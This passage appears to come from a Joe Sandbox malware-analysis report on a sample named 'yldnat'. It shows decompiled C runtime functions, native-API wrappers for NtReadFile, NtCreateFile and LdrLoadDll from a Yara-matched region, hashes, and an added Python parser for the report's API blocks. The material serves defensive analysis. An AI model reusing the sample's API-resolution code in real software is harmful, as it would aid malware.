                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 013B38E2
                                                        • GetStartupInfoW.KERNEL32(?,013C2260,00000064,013B1654,013C2190,00000014), ref: 013B393B
                                                        • __calloc_crt.LIBCMT ref: 013B3986
                                                        • GetFileType.KERNEL32 ref: 013B39CF
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.983533144.00000000013B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 013B0000, based on PE: true
                                                        • Associated: 00000005.00000002.983529361.00000000013B0000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000005.00000002.983545056.00000000013BE000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000005.00000002.983553202.00000000013C3000.00000004.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000005.00000002.983563219.00000000013C7000.00000002.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_13b0000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: __calloc_crt$CallCriticalEnterFileFilterFunc@8InfoSectionStartupType__calloc_impl__lock__mtinitlocknum
                                                        • String ID:
                                                        • API String ID: 2772871689-0
                                                        • Opcode ID: da754f77a62c1b6ce1f50bf49b53589930d17e64e9fb6347d91e4e545bfb3738
                                                        • Instruction ID: 463fd28c463a446911fc3b38428eb700c8d6f8cb2cb158ca4cb62a813851a8ee
                                                        • Opcode Fuzzy Hash: da754f77a62c1b6ce1f50bf49b53589930d17e64e9fb6347d91e4e545bfb3738
                                                        • Instruction Fuzzy Hash: 2881A371D042658EDB24CF68D8C06E9BFF4BF05328B24426DD6A6ABBC1E7359402CB54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 91%
                                                        			E013B3815(void* __ebx, void* __edi, void* __eflags) {
                                                        				void* __esi;
                                                        				void* _t3;
                                                        				intOrPtr _t6;
                                                        				long _t14;
                                                        				long* _t27;
                                                        
                                                        				E013B1890(_t3);
                                                        				if(E013B4560() != 0) {
                                                        					_t6 = E013B4001(E013B35A6);
                                                        					 *0x13c350c = _t6;
                                                        					__eflags = _t6 - 0xffffffff;
                                                        					if(_t6 == 0xffffffff) {
                                                        						goto L1;
                                                        					} else {
                                                        						_t27 = E013B4869(1, 0x3bc);
                                                        						__eflags = _t27;
                                                        						if(_t27 == 0) {
                                                        							L6:
                                                        							E013B388B();
                                                        							__eflags = 0;
                                                        							return 0;
                                                        						} else {
                                                        							__eflags = E013B405D( *0x13c350c, _t27);
                                                        							if(__eflags == 0) {
                                                        								goto L6;
                                                        							} else {
                                                        								_push(0);
                                                        								_push(_t27);
                                                        								E013B3762(__ebx, __edi, _t27, __eflags);
                                                        								_t14 = GetCurrentThreadId();
                                                        								_t27[1] = _t27[1] | 0xffffffff;
                                                        								 *_t27 = _t14;
                                                        								__eflags = 1;
                                                        								return 1;
                                                        							}
                                                        						}
                                                        					}
                                                        				} else {
                                                        					L1:
                                                        					E013B388B();
                                                        					return 0;
                                                        				}
                                                        			}

                                                        APIs
                                                        • __init_pointers.LIBCMT ref: 013B3815
                                                          • Part of subcall function 013B1890: RtlEncodePointer.NTDLL(00000000,?,013B381A,013B163A,013C2190,00000014), ref: 013B1893
                                                          • Part of subcall function 013B1890: __initp_misc_winsig.LIBCMT ref: 013B18AE
                                                          • Part of subcall function 013B1890: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 013B4117
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 013B412B
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 013B413E
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 013B4151
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 013B4164
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 013B4177
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 013B418A
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 013B419D
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 013B41B0
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 013B41C3
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 013B41D6
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 013B41E9
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 013B41FC
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 013B420F
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 013B4222
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 013B4235
                                                        • __mtinitlocks.LIBCMT ref: 013B381A
                                                        • __mtterm.LIBCMT ref: 013B3823
                                                          • Part of subcall function 013B388B: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,013B3828,013B163A,013C2190,00000014), ref: 013B447A
                                                          • Part of subcall function 013B388B: _free.LIBCMT ref: 013B4481
                                                          • Part of subcall function 013B388B: DeleteCriticalSection.KERNEL32(013C3558,?,?,013B3828,013B163A,013C2190,00000014), ref: 013B44A3
                                                        • __calloc_crt.LIBCMT ref: 013B3848
                                                        • __initptd.LIBCMT ref: 013B386A
                                                        • GetCurrentThreadId.KERNEL32(013B163A,013C2190,00000014), ref: 013B3871
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.983533144.00000000013B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 013B0000, based on PE: true
                                                        • Associated: 00000005.00000002.983529361.00000000013B0000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000005.00000002.983545056.00000000013BE000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000005.00000002.983553202.00000000013C3000.00000004.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000005.00000002.983563219.00000000013C7000.00000002.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_13b0000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                        • String ID:
                                                        • API String ID: 3567560977-0
                                                        • Opcode ID: a3341522df69caadc8c04ee5c7168d8094e6b8cd2ca5b32baa230ad00c5bf104
                                                        • Instruction ID: 4ff6e06c271ae31320a9a8c990d9df11fcff4c1183c2e4631f0cd89de2c6d58c
                                                        • Opcode Fuzzy Hash: a3341522df69caadc8c04ee5c7168d8094e6b8cd2ca5b32baa230ad00c5bf104
                                                        • Instruction Fuzzy Hash: 89F09032509632ADE239767D7CC16DA2E84EF1177CF20862EE761D8CD1FF2294414795
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 95%
                                                        			E013B7452(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                                                        				void* _t7;
                                                        				void* _t8;
                                                        				intOrPtr* _t9;
                                                        				intOrPtr* _t12;
                                                        				void* _t20;
                                                        				long _t31;
                                                        
                                                        				if(_a4 != 0) {
                                                        					_t31 = _a8;
                                                        					if(_t31 != 0) {
                                                        						_push(__ebx);
                                                        						while(_t31 <= 0xffffffe0) {
                                                        							if(_t31 == 0) {
                                                        								_t31 = _t31 + 1;
                                                        							}
                                                        							_t7 = HeapReAlloc( *0x13c4834, 0, _a4, _t31);
                                                        							_t20 = _t7;
                                                        							if(_t20 != 0) {
                                                        								L17:
                                                        								_t8 = _t20;
                                                        							} else {
                                                        								if( *0x13c4830 == _t7) {
                                                        									_t9 = E013B1CC3();
                                                        									 *_t9 = E013B1CD6(GetLastError());
                                                        									goto L17;
                                                        								} else {
                                                        									if(E013B1741(_t7, _t31) == 0) {
                                                        										_t12 = E013B1CC3();
                                                        										 *_t12 = E013B1CD6(GetLastError());
                                                        										L12:
                                                        										_t8 = 0;
                                                        									} else {
                                                        										continue;
                                                        									}
                                                        								}
                                                        							}
                                                        							goto L14;
                                                        						}
                                                        						E013B1741(_t6, _t31);
                                                        						 *((intOrPtr*)(E013B1CC3())) = 0xc;
                                                        						goto L12;
                                                        					} else {
                                                        						E013B4831(_a4);
                                                        						_t8 = 0;
                                                        					}
                                                        					L14:
                                                        					return _t8;
                                                        				} else {
                                                        					return E013B1147(__ebx, __edx, __edi, _a8);
                                                        				}
                                                        			}

Instruction addresses for the listing above (a per-line side column in the original report, not reproduced here): 0x013b7459 to 0x013b74f9

                                                        APIs
                                                        • _malloc.LIBCMT ref: 013B745E
                                                          • Part of subcall function 013B1147: __FF_MSGBANNER.LIBCMT ref: 013B115E
                                                          • Part of subcall function 013B1147: __NMSG_WRITE.LIBCMT ref: 013B1165
                                                          • Part of subcall function 013B1147: RtlAllocateHeap.NTDLL(00800000,00000000,00000001,00000000,00000000,00000000,?,013B48C7,00000000,00000000,00000000,00000000,?,013B44F9,00000018,013C2280), ref: 013B118A
                                                        • _free.LIBCMT ref: 013B7471
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.983533144.00000000013B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 013B0000, based on PE: true
• Associated: 00000005.00000002.983529361.00000000013B0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.983545056.00000000013BE000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.983553202.00000000013C3000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.983563219.00000000013C7000.00000002.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_13b0000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap_free_malloc
                                                        • String ID:
                                                        • API String ID: 1020059152-0
                                                        • Opcode ID: d656b58623f40118e1b26a5e5085a7896989b0954aeb260ebf081a9e9bc256f3
                                                        • Instruction ID: 859dcdae0e9d528b2c7f2f5ac264ad57fc5d2a7282168220c136b21e0d057271
                                                        • Opcode Fuzzy Hash: d656b58623f40118e1b26a5e5085a7896989b0954aeb260ebf081a9e9bc256f3
                                                        • Instruction Fuzzy Hash: C2119431805616AACB313E7CB8D46D93F98EB50369F104525EB49AAEC0FA788940C790
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E013B91C6(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                        				char _v8;
                                                        				intOrPtr _v12;
                                                        				signed int _v20;
                                                        				signed int _t35;
                                                        				int _t38;
                                                        				signed int _t41;
                                                        				int _t42;
                                                        				intOrPtr* _t44;
                                                        				int _t47;
                                                        				short* _t49;
                                                        				intOrPtr _t50;
                                                        				intOrPtr _t54;
                                                        				int _t55;
                                                        				signed int _t59;
                                                        				char* _t62;
                                                        
                                                        				_t62 = _a8;
                                                        				if(_t62 == 0) {
                                                        					L5:
                                                        					return 0;
                                                        				}
                                                        				_t50 = _a12;
                                                        				if(_t50 == 0) {
                                                        					goto L5;
                                                        				}
                                                        				if( *_t62 != 0) {
                                                        					E013B4BFC( &_v20, _a16);
                                                        					_t35 = _v20;
                                                        					__eflags =  *(_t35 + 0xa8);
                                                        					if( *(_t35 + 0xa8) != 0) {
                                                        						_t38 = E013B917B( *_t62 & 0x000000ff,  &_v20);
                                                        						__eflags = _t38;
                                                        						if(_t38 == 0) {
                                                        							__eflags = _a4;
                                                        							_t41 = _v20;
                                                        							_t59 = 1;
                                                        							_t28 = _t41 + 4; // 0x840ffff8
                                                        							_t42 = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                                                        							__eflags = _t42;
                                                        							if(_t42 != 0) {
                                                        								L21:
                                                        								__eflags = _v8;
                                                        								if(_v8 != 0) {
                                                        									_t54 = _v12;
                                                        									_t31 = _t54 + 0x70;
                                                        									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                                                        									__eflags =  *_t31;
                                                        								}
                                                        								return _t59;
                                                        							}
                                                        							L20:
                                                        							_t44 = E013B1CC3();
                                                        							_t59 = _t59 | 0xffffffff;
                                                        							__eflags = _t59;
                                                        							 *_t44 = 0x2a;
                                                        							goto L21;
                                                        						}
                                                        						_t59 = _v20;
                                                        						__eflags =  *(_t59 + 0x74) - 1;
                                                        						if( *(_t59 + 0x74) <= 1) {
                                                        							L15:
                                                        							_t20 = _t59 + 0x74; // 0xe1c11fe1
                                                        							__eflags = _t50 -  *_t20;
                                                        							L16:
                                                        							if(__eflags < 0) {
                                                        								goto L20;
                                                        							}
                                                        							__eflags = _t62[1];
                                                        							if(_t62[1] == 0) {
                                                        								goto L20;
                                                        							}
                                                        							L18:
                                                        							_t22 = _t59 + 0x74; // 0xe1c11fe1
                                                        							_t59 =  *_t22;
                                                        							goto L21;
                                                        						}
                                                        						_t12 = _t59 + 0x74; // 0xe1c11fe1
                                                        						__eflags = _t50 -  *_t12;
                                                        						if(__eflags < 0) {
                                                        							goto L16;
                                                        						}
                                                        						__eflags = _a4;
                                                        						_t17 = _t59 + 0x74; // 0xe1c11fe1
                                                        						_t18 = _t59 + 4; // 0x840ffff8
                                                        						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
                                                        						_t59 = _v20;
                                                        						__eflags = _t47;
                                                        						if(_t47 != 0) {
                                                        							goto L18;
                                                        						}
                                                        						goto L15;
                                                        					}
                                                        					_t55 = _a4;
                                                        					__eflags = _t55;
                                                        					if(_t55 != 0) {
                                                        						 *_t55 =  *_t62 & 0x000000ff;
                                                        					}
                                                        					_t59 = 1;
                                                        					goto L21;
                                                        				}
                                                        				_t49 = _a4;
                                                        				if(_t49 != 0) {
                                                        					 *_t49 = 0;
                                                        				}
                                                        				goto L5;
                                                        			}

Instruction addresses for the listing above (a per-line side column in the original report, not reproduced here): 0x013b91ce to 0x013b92b5

                                                        APIs
                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 013B91FC
                                                        • __isleadbyte_l.LIBCMT ref: 013B922A
                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000), ref: 013B9258
                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000), ref: 013B928E
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.983533144.00000000013B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 013B0000, based on PE: true
• Associated: 00000005.00000002.983529361.00000000013B0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.983545056.00000000013BE000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.983553202.00000000013C3000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.983563219.00000000013C7000.00000002.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_13b0000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                        • String ID:
                                                        • API String ID: 3058430110-0
                                                        • Opcode ID: 179524b547c1659d597cb0f7ecacbe480c9fc492c6471cc5f858324418a6fecd
                                                        • Instruction ID: d86a7a1f11582a673608fc84ac8bb432bb18804f92e15a5ae5a2cb95dde52d73
                                                        • Opcode Fuzzy Hash: 179524b547c1659d597cb0f7ecacbe480c9fc492c6471cc5f858324418a6fecd
                                                        • Instruction Fuzzy Hash: 9C31C271A0024EAFEB218E69CC84BEA7FA9BF4131CF154128E7158B990F731D850DB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E013BA94D(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                        				intOrPtr _t25;
                                                        				void* _t26;
                                                        
                                                        				_t25 = _a16;
                                                        				if(_t25 == 0x65 || _t25 == 0x45) {
                                                        					_t26 = E013BAE9E(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                        					goto L9;
                                                        				} else {
                                                        					_t34 = _t25 - 0x66;
                                                        					if(_t25 != 0x66) {
                                                        						__eflags = _t25 - 0x61;
                                                        						if(_t25 == 0x61) {
                                                        							L7:
                                                        							_t26 = E013BA9D3(_a4, _a8, _a12, _a20, _a24, _a28);
                                                        						} else {
                                                        							__eflags = _t25 - 0x41;
                                                        							if(__eflags == 0) {
                                                        								goto L7;
                                                        							} else {
                                                        								_t26 = E013BB119(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                        							}
                                                        						}
                                                        						L9:
                                                        						return _t26;
                                                        					} else {
                                                        						return E013BB058(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
                                                        					}
                                                        				}
                                                        			}

Instruction addresses for the listing above (a per-line side column in the original report, not reproduced here): 0x013ba950 to 0x013ba9d2

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.983533144.00000000013B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 013B0000, based on PE: true
• Associated: 00000005.00000002.983529361.00000000013B0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.983545056.00000000013BE000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.983553202.00000000013C3000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.983563219.00000000013C7000.00000002.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_13b0000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                        • String ID:
                                                        • API String ID: 3016257755-0
                                                        • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                        • Instruction ID: d722a6699da6baaa2af529011bcd170f5a409b5f950ebcbb33fffb9adf9c83e0
                                                        • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                        • Instruction Fuzzy Hash: 72014C7604464EFBCF125F88CC818EE3F66BB19258B4A8515FF195A830E736C5B1BB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%
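Each listing above ends in an "APIs" block of the same shape: one bullet per call the engine resolved, written as name.MODULE, an optional argument list as observed at the call site, the call-site address after "ref:", and a "Part of subcall function" prefix when a callee rather than the function itself makes the call. The LIBCMT entries (_malloc, _free, _LocaleUpdate, __isleadbyte_l) mark statically linked C runtime code, which is noise when triaging what the sample itself does; the KERNEL32 and NTDLL entries are the ones to keep. The Python below is an added example and is not part of the Joe Sandbox report or its tooling: it parses these blocks, using input copied from the blocks above, and separates OS calls from CRT calls. It assumes the entry format stays as regular as shown here, that LIBCMT and LIBCMTD are the only module labels for runtime code, and that "?" in an argument list marks a value the engine could not recover.

```python
"""Parse the per-function "APIs" blocks of a Joe Sandbox decompiled-code listing (added example)."""
import re
from dataclasses import dataclass
from typing import Optional

# One bullet per resolved call; the "Part of subcall function" prefix and the argument list are optional:
#   • Part of subcall function 013B1147: __NMSG_WRITE.LIBCMT ref: 013B1165
#   • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000), ref: 013B9258
ENTRY_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<via>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[\w:$@?]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# Function signature line "E013B91C6(...) {"; statement lines end with ';' and do not match.
SIG_RE = re.compile(r"^\s*(?P<fn>E[0-9A-Fa-f]{8})\(.*\)\s*\{\s*$")
CRT_MODULES = {"LIBCMT", "LIBCMTD"}   # assumption: labels of statically linked CRT


@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: tuple            # recovered 32-bit values as ints, None for '?'
    ref: int               # call-site address
    via: Optional[int]     # callee that actually makes the call, else None

    @property
    def is_crt(self) -> bool:
        return self.module.upper() in CRT_MODULES


def _parse_args(raw: Optional[str]) -> tuple:
    if not raw:
        return ()
    # assumption: '?' marks an argument value the engine could not recover
    return tuple(None if t.strip() == "?" else int(t, 16) for t in raw.split(","))


def parse_api_block(text: str) -> list:
    """Parse the bullets of one APIs block; header and non-entry lines are ignored."""
    calls = []
    for m in filter(None, map(ENTRY_RE.match, text.splitlines())):
        via = m.group("via")
        calls.append(ApiCall(m.group("name"), m.group("module"),
                             _parse_args(m.group("args")), int(m.group("ref"), 16),
                             int(via, 16) if via else None))
    return calls


def parse_listing(text: str) -> dict:
    """Walk a whole listing and key each APIs block by the preceding function signature."""
    result, current_fn, block = {}, "(unknown)", None
    for line in text.splitlines():
        sig = SIG_RE.match(line)
        if sig:
            current_fn = sig.group("fn")
        elif line.strip() == "APIs":
            block = result.setdefault(current_fn, [])   # empty block -> no calls
        elif line.strip() == "Memory Dump Source":
            block = None
        elif block is not None:
            block.extend(parse_api_block(line))
    return result


def os_calls(calls) -> list:
    """Non-CRT calls as (name, module, call site, reached via a subcall?)."""
    return [(c.name, c.module, f"{c.ref:08X}", c.via is not None)
            for c in calls if not c.is_crt]


# Constructed sample: the APIs block of the malloc/free function above, verbatim.
SAMPLE_BLOCK = """\
APIs
• _malloc.LIBCMT ref: 013B745E
  • Part of subcall function 013B1147: __FF_MSGBANNER.LIBCMT ref: 013B115E
  • Part of subcall function 013B1147: __NMSG_WRITE.LIBCMT ref: 013B1165
  • Part of subcall function 013B1147: RtlAllocateHeap.NTDLL(00800000,00000000,00000001,00000000,00000000,00000000,?,013B48C7,00000000,00000000,00000000,00000000,?,013B44F9,00000018,013C2280), ref: 013B118A
• _free.LIBCMT ref: 013B7471
Memory Dump Source
"""

# Constructed excerpt of a two-function listing (bodies trimmed, APIs blocks
# copied from the report); the second function's APIs block is empty.
SAMPLE_LISTING = """\
            E013B91C6(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                E013B4BFC( &_v20, _a16);
APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 013B91FC
• __isleadbyte_l.LIBCMT ref: 013B922A
• MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000), ref: 013B9258
• MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000), ref: 013B928E
Memory Dump Source
            E013BA94D(void* __esi, intOrPtr _a4, intOrPtr _a8) {
APIs
Memory Dump Source
"""
```

parse_listing keys each block by the E-prefixed signature that precedes it, so a block with no bullets (as for E013BA94D) yields an empty list instead of being merged into the previous function; os_calls then leaves only the entries an analyst would actually read, with the RtlAllocateHeap call correctly marked as reached through the subcall at 013B1147 rather than from the function itself.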

                                                        Execution Graph

                                                        Execution Coverage:3%
                                                        Dynamic/Decrypted Code Coverage:3.5%
                                                        Signature Coverage:5.7%
                                                        Total number of Nodes:634
                                                        Total number of Limit Nodes:3

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 41a380-41a3c9 call 41af20 NtReadFile
                                                        C-Code - Quality: 37%
                                                        			E0041A380(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                                        				void* _t18;
                                                        				intOrPtr* _t27;
                                                        				intOrPtr _t13; // temporaries used below but left undeclared by the decompiler
                                                        				char* _t4;
                                                        				char* _t6;
                                                        				char* _t12;
                                                        
                                                        				_t13 = _a4;
                                                        				_t27 = _a4 + 0xc64; // slot holding the resolved NtReadFile pointer
                                                        				E0041AF20( *((intOrPtr*)(_t13 + 0x14)), _t13, _t27,  *((intOrPtr*)(_t13 + 0x14)), 0, 0x2a); // resolve the API by hash (0x2a) via LdrLoadDll
                                                        				_t4 =  &_a40; // 0x415621
                                                        				_t6 =  &_a32; // 0x415962
                                                        				_t12 =  &_a8; // 0x415962
                                                        				_t18 =  *((intOrPtr*)( *_t27))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed: indirect call to NtReadFile
                                                        				return _t18;
                                                        			}


                                                        APIs
                                                        • NtReadFile.NTDLL(bYA,5DB515AF,FFFFFFFF,?,?,?,bYA,?,!VA,FFFFFFFF,5DB515AF,00415962,?,00000000), ref: 0041A3C5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_400000_yldnat.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID: !VA$bYA$bYA
                                                        • API String ID: 2738559852-1892722986
                                                        • Opcode ID: b510bff5fdfeed8eb0fffb7cee2b24ec4e8af31a288f6594e015d3a0b80bf648
                                                        • Instruction ID: a082e577e587f18bad2a0ac2af42633e1a6d87433a9ff8ac06d3019b9616f73f
                                                        • Opcode Fuzzy Hash: b510bff5fdfeed8eb0fffb7cee2b24ec4e8af31a288f6594e015d3a0b80bf648
                                                        • Instruction Fuzzy Hash: 62F0A4B2200208ABCB14DF99DC85EEB77ADAF8C754F118249BA0D97241D630E811CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 227 41a28a-41a28f 228 41a291-41a2c9 call 41af20 227->228 229 41a2e6-41a321 call 41af20 NtCreateFile 227->229 228->229
                                                        APIs
                                                        • NtCreateFile.NTDLL(00000060,004090B3,?,004157A7,004090B3,FFFFFFFF,?,?,FFFFFFFF,004090B3,004157A7,?,004090B3,00000060,00000000,00000000), ref: 0041A31D
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_400000_yldnat.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 67b207398dec21cea9c5f2fdcc8201dcaed53f7e534dc20bd5e479b03b2dd50c
                                                        • Instruction ID: 1dfaf056c71c304fbd68e1a8a8bc5405c5af5c9ae836129a1c918a3199dc8486
                                                        • Opcode Fuzzy Hash: 67b207398dec21cea9c5f2fdcc8201dcaed53f7e534dc20bd5e479b03b2dd50c
                                                        • Instruction Fuzzy Hash: 7011C2B2205108ABCB18DF88DC85DEB77ADEF8C754F108509FA0D97241D634E861CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 267 40a0e0-40a109 call 41cd70 270 40a10b-40a10e 267->270 271 40a10f-40a11d call 41d190 267->271 274 40a12d-40a13e call 41b4c0 271->274 275 40a11f-40a12a call 41d410 271->275 280 40a140-40a154 LdrLoadDll 274->280 281 40a157-40a15a 274->281 275->274 280->281
                                                        C-Code - Quality: 100%
                                                        			E0040A0E0(void* __edi, void* __eflags, void* _a4, intOrPtr _a8) {
                                                        				char* _v8;
                                                        				struct _EXCEPTION_RECORD _v12;
                                                        				struct _OBJDIR_INFORMATION _v16;
                                                        				char _v536;
                                                        				void* _t15;
                                                        				struct _OBJDIR_INFORMATION _t17;
                                                        				struct _OBJDIR_INFORMATION _t18;
                                                        				void* _t31;
                                                        				void* _t32;
                                                        				void* _t33;
                                                        
                                                        				_v8 =  &_v536;
                                                        				_t15 = E0041CD70(__edi,  &_v12, 0x104, _a8);
                                                        				_t32 = _t31 + 0xc;
                                                        				if(_t15 != 0) {
                                                        					_t17 = E0041D190(__eflags, _v8);
                                                        					_t33 = _t32 + 4;
                                                        					__eflags = _t17;
                                                        					if(_t17 != 0) {
                                                        						E0041D410( &_v12, 0);
                                                        						_t33 = _t33 + 8;
                                                        					}
                                                        					_t18 = E0041B4C0(_v8);
                                                        					_v16 = _t18;
                                                        					__eflags = _t18;
                                                        					if(_t18 == 0) {
                                                        						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                        						return _v16;
                                                        					}
                                                        					return _t18;
                                                        				} else {
                                                        					return _t15;
                                                        				}
                                                        			}


                                                        APIs
                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040A152
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_400000_yldnat.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Load
                                                        • String ID:
                                                        • API String ID: 2234796835-0
                                                        • Opcode ID: 40796ed2abedf08632889fec39371184e398d1dfafb99c177ad60987c42a2680
                                                        • Instruction ID: 2d0d09612ad2a2ca92ab0b29bd402b5d77c55f859f0073fa60504bb5a6634220
